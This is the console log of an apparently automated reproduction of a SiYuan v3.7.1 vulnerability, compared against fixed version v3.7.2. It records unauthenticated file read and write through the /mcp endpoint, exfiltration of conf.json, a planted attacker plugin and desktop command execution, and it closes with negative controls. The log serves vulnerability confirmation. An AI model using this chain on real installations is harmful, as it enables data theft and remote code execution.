[*] Using project cache: /pruva/project-cache [*] Installing build and desktop runtime dependencies (sudo apt-get) ... [*] Cloning SiYuan repository ... [*] Vulnerable ref v3.7.1 -> c72ca4cd09019e5f64afdee8f8c6ec5ef34858db [*] Fixed ref v3.7.2 -> 726dae1d518927f70ea609bc146288b9aa95e366 [+] Source check: v3.7.1 lacks MCP admin role gate; v3.7.2 adds CheckAdminRole [*] Building v3.7.1 kernel (c72ca4cd09019e5f64afdee8f8c6ec5ef34858db) ... [+] v3.7.1 kernel ready at /pruva/project-cache/builds/siyuan-kernel-v3.7.1 [*] Building v3.7.2 kernel (726dae1d518927f70ea609bc146288b9aa95e366) ... [+] v3.7.2 kernel ready at /pruva/project-cache/builds/siyuan-kernel-v3.7.2 [*] Downloading real SiYuan v3.7.1 Linux desktop release ... [*] Extracting real SiYuan v3.7.1 Linux desktop release ... [*] Real desktop binary: /tmp/siyuan-desktop-runtime/siyuan-3.7.1-linux/siyuan [*] Starting vulnerable SiYuan v3.7.1 kernel with anonymous Publish ... [*] Sending unauthenticated MCP initialize through Publish proxy ... [+] Vulnerable /mcp returned session: d55hxqzbzsn6gkge [+] Unauthorized workspace file write via /mcp succeeded [+] Unauthorized workspace file read via /mcp succeeded [+] conf/conf.json exfiltrated via /mcp file tool [+] Attacker plugin and petals.json were planted through the unauthenticated MCP file tool [*] Launching real SiYuan v3.7.1 Electron desktop under Xvfb with MCP-planted workspace ... [+] Real desktop command execution observed from MCP-planted plugin: PRUVA_MCP_DESKTOP_RCE_1785131179-1uid=1000(vscode) gid=1000(vscode) groups=1000(vscode) [*] Negative control: vulnerable v3.7.1 with Publish auth enabled ... [+] Auth-enabled negative control blocked unauthenticated /mcp with HTTP 401 [*] Negative control: fixed SiYuan v3.7.2 with anonymous Publish ... [+] Fixed-version negative control blocked unauthenticated /mcp with HTTP 401 [+] Reproduction complete: confirmed unauthenticated /mcp read/write and MCP-planted desktop plugin command execution on v3.7.1; auth-enabled and v3.7.2 controls block the initial /mcp path.